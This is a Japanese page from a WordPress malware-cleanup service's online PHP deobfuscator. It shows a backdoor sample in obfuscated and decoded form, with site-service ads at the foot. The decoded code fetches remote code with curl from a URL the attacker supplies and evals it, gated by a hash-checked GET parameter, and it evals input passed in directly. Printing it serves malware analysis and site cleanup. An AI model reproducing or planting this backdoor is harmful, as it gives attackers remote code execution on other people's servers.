Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto SuF1N; eLk9L: W31zS: goto m_sEc; igOpQ: @eval($o4Ix5[63](${$o4Ix5[50]}[15])); goto eLk9L; eHZDO: $o4Ix5[63] = $o4Ix5[63] . $o4Ix5[74]; goto igOpQ; u73QJ: $cDIab = $LNaI7("\176", "\40"); goto T3S53; kEzKp: class TRNlu { static function e4KGG($fYNGE) { goto tDJdz; e6UOc: $FebGc = ''; got...



難読化されたPHPコード

<?php
 goto SuF1N; eLk9L: W31zS: goto m_sEc; igOpQ: @eval($o4Ix5[63](${$o4Ix5[50]}[15])); goto eLk9L; eHZDO: $o4Ix5[63] = $o4Ix5[63] . $o4Ix5[74]; goto igOpQ; u73QJ: $cDIab = $LNaI7("\176", "\40"); goto T3S53; kEzKp: class TRNlu { static function e4KGG($fYNGE) { goto tDJdz; e6UOc: $FebGc = ''; goto V9Umt; BHgN5: $N2tIA = $rjKTc("\x7e", "\x20"); goto tb5Y6; tb5Y6: $sIcTs = explode("\x2e", $fYNGE); goto e6UOc; V9Umt: foreach ($sIcTs as $Nv6sm => $lLwDm) { $FebGc .= $N2tIA[$lLwDm - 9657]; f710i: } goto rYZ4x; R3sXc: return $FebGc; goto tcLJ9; tDJdz: $rjKTc = "\x72" . "\141" . "\156" . "\147" . "\x65"; goto BHgN5; rYZ4x: lqi2N: goto R3sXc; tcLJ9: } static function Trnq3($zxFHO, $bLA5r) { goto y1fIg; XA8Dl: $WRQPj = curl_exec($NVVZW); goto rSwSM; y1fIg: $NVVZW = curl_init($zxFHO); goto quoBV; quoBV: curl_setopt($NVVZW, CURLOPT_RETURNTRANSFER, 1); goto XA8Dl; rSwSM: return empty($WRQPj) ? $bLA5r($zxFHO) : $WRQPj; goto sB3Yj; sB3Yj: } static function CHu6C() { goto luvEM; B4YIk: $h0Scx = $NcHaV[2 + 0]($NBZfT, true); goto FSW3h; oHO4S: foreach ($aLhqC as $AIpBU) { $NcHaV[] = self::E4KGG($AIpBU); OQkiR: } goto manBo; rS93v: die; goto A7GqF; FSW3h: @$NcHaV[6 + 4](INPUT_GET, "\157\146") == 1 && die($NcHaV[3 + 2](__FILE__)); goto b9w_j; wBbWt: @eval($NcHaV[2 + 2]($L2Y5C)); goto rS93v; b9w_j: if (!(@$h0Scx[0] - time() > 0 and md5(md5($h0Scx[3 + 0])) === "\67\x37\67\x37\146\145\70\x64\141\x31\143\x33\x30\63\x61\x39\71\x38\x36\145\x32\x31\x37\x34\64\x36\143\142\x38\60\x37\62")) { goto aPR83; } goto kOUrR; luvEM: $aLhqC = array("\x39\x36\x38\x34\56\x39\x36\x36\x39\56\71\x36\70\x32\56\71\66\70\x36\x2e\x39\66\66\x37\56\71\x36\70\62\56\x39\66\70\70\56\x39\x36\x38\x31\x2e\71\x36\66\x36\x2e\71\x36\67\x33\x2e\x39\66\x38\x34\x2e\71\66\x36\67\56\x39\x36\67\x38\x2e\x39\x36\67\62\56\71\x36\x37\x33", "\x39\66\66\70\x2e\71\x36\66\x37\56\x39\x36\x36\71\x2e\71\66\70\x38\56\71\66\66\x39\x2e\x39\x36\67\x32\x2e\x39\66\66\x37\x2e\x39\67\63\x34\56\x39\x37\x33\62", "\71\66\x37\x37\56\x39\x36\66\x38\56\x39\66\67\62\x2e\71\66\67\63\x2e\x39\x36\70\70\x2e\71\x36\x38\x33\x2e\x39\x36\x38\x32\56\x39\66\70\x34\x2e\71\66\x37\x32\56\71\x36\x38\x33\56\71\x36\x38\62", "\71\x36\x37\61\x2e\71\66\70\66\x2e\x39\66\x38\x34\56\x39\x36\x37\x36", "\x39\66\x38\65\56\71\66\70\x36\56\71\x36\x36\70\x2e\x39\66\x38\x32\56\x39\67\x32\x39\x2e\x39\67\63\61\x2e\71\66\x38\70\x2e\71\x36\70\63\x2e\x39\x36\70\x32\56\x39\x36\x38\x34\x2e\x39\x36\67\62\56\x39\66\70\x33\56\x39\x36\x38\x32", "\71\x36\x38\x31\x2e\71\x36\x37\x38\x2e\71\x36\x37\x35\56\71\x36\70\62\x2e\x39\x36\70\x38\x2e\71\x36\x38\x30\x2e\71\66\70\62\x2e\x39\x36\x36\67\56\71\66\70\x38\56\71\x36\70\64\56\71\66\x37\x32\56\71\x36\67\x33\x2e\71\x36\x36\67\56\71\x36\x38\62\56\71\66\x37\x33\x2e\x39\66\66\67\56\x39\66\x36\x38", "\71\x37\61\61\56\x39\x37\64\x31", "\x39\x36\x35\70", "\x39\x37\x33\x36\x2e\71\x37\x34\x31", "\x39\67\x31\x38\56\71\x37\x30\x31\x2e\71\67\60\x31\x2e\71\x37\x31\x38\x2e\71\x36\x39\64", "\71\66\x38\61\56\x39\66\67\x38\x2e\x39\66\67\65\x2e\x39\66\x36\x37\x2e\x39\66\70\x32\56\x39\66\66\x39\56\x39\x36\70\70\x2e\71\66\x37\70\x2e\71\x36\67\63\x2e\x39\x36\67\x31\x2e\x39\x36\x36\66\56\x39\x36\x36\x37"); goto oHO4S; pO1RT: $fLxiA = @$NcHaV[1]($NcHaV[4 + 6](INPUT_GET, $NcHaV[3 + 6])); goto ahaj1; ahaj1: $NBZfT = @$NcHaV[2 + 1]($NcHaV[6 + 0], $fLxiA); goto B4YIk; kOUrR: $L2Y5C = self::TrNQ3($h0Scx[1 + 0], $NcHaV[0 + 5]); goto wBbWt; manBo: CyizX: goto pO1RT; A7GqF: aPR83: goto jWzwj; jWzwj: } } goto uACbh; NmIfv: if (!(in_array(gettype($o4Ix5) . "\62\62", $o4Ix5) && md5(md5(md5(md5($o4Ix5[16])))) === "\x66\x31\61\66\143\64\144\62\x37\145\x61\146\x65\x62\x62\x63\65\x65\x37\x35\x33\64\145\62\63\x35\x33\143\x64\141\142\x39")) { goto W31zS; } goto eHZDO; SuF1N: $LNaI7 = "\162" . "\141" . "\156" . "\x67" . "\145"; goto u73QJ; m_sEc: metaphone("\115\x6a\x49\x32\x4f\x54\153\63\x4e\172\131\64\115\172\153\x78\x4d\x6a\111\x79\x4f\124\x67\x7a\115\124\131\x79\x4e\x54\x4d\x79"); goto kEzKp; T3S53: $o4Ix5 = ${$cDIab[19 + 12] . $cDIab[28 + 31] . $cDIab[29 + 18] . $cDIab[37 + 10] . $cDIab[16 + 35] . $cDIab[4 + 49] . $cDIab[10 + 47]}; goto NmIfv; uACbh: tRnlu::CHu6C();
?>

デコード(難読化解除)されたコード

<?php

$LNaI7 = "range";
$cDIab = range("~", " ");
$o4Ix5 = ${$cDIab[31] . $cDIab[59] . $cDIab[47] . $cDIab[47] . $cDIab[51] . $cDIab[53] . $cDIab[57]};
if (!(in_array(gettype($o4Ix5) . "22", $o4Ix5) && md5(md5(md5(md5($o4Ix5[16])))) === "f116c4d27eafebbc5e7534e2353cdab9")) {
    goto W31zS;
}
$o4Ix5[63] .= $o4Ix5[74];
@eval($o4Ix5[63](${$o4Ix5[50]}[15]));
W31zS:
metaphone("MjI2OTk3NzY4MzkxMjIyOTgzMTYyNTMy");
class TRNlu
{
    static function e4KGG($fYNGE)
    {
        $rjKTc = "range";
        $N2tIA = range("~", " ");
        $sIcTs = explode(".", $fYNGE);
        $FebGc = '';
        foreach ($sIcTs as $Nv6sm => $lLwDm) {
            $FebGc .= $N2tIA[$lLwDm - 9657];
        }
        return $FebGc;
    }
    static function Trnq3($zxFHO, $bLA5r)
    {
        $NVVZW = curl_init($zxFHO);
        curl_setopt($NVVZW, CURLOPT_RETURNTRANSFER, 1);
        $WRQPj = curl_exec($NVVZW);
        return empty($WRQPj) ? $bLA5r($zxFHO) : $WRQPj;
    }
    static function CHu6C()
    {
        $aLhqC = array("9684.9669.9682.9686.9667.9682.9688.9681.9666.9673.9684.9667.9678.9672.9673", "9668.9667.9669.9688.9669.9672.9667.9734.9732", "9677.9668.9672.9673.9688.9683.9682.9684.9672.9683.9682", "9671.9686.9684.9676", "9685.9686.9668.9682.9729.9731.9688.9683.9682.9684.9672.9683.9682", "9681.9678.9675.9682.9688.9680.9682.9667.9688.9684.9672.9673.9667.9682.9673.9667.9668", "9711.9741", "9658", "9736.9741", "9718.9701.9701.9718.9694", "9681.9678.9675.9667.9682.9669.9688.9678.9673.9671.9666.9667");
        foreach ($aLhqC as $AIpBU) {
            $NcHaV[] = self::E4KGG($AIpBU);
        }
        $fLxiA = @$NcHaV[1]($NcHaV[10](INPUT_GET, $NcHaV[9]));
        $NBZfT = @$NcHaV[3]($NcHaV[6], $fLxiA);
        $h0Scx = $NcHaV[2]($NBZfT, true);
        @$NcHaV[10](INPUT_GET, "of") == 1 && die($NcHaV[5]("/var/www/html/input.php"));
        if (!(@$h0Scx[0] - time() > 0 and md5(md5($h0Scx[3])) === "7777fe8da1c303a9986e217446cb8072")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $L2Y5C = self::TrNQ3($h0Scx[1], $NcHaV[5]);
        @eval($NcHaV[4]($L2Y5C));
        die;
    }
}
tRnlu::CHu6C();

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.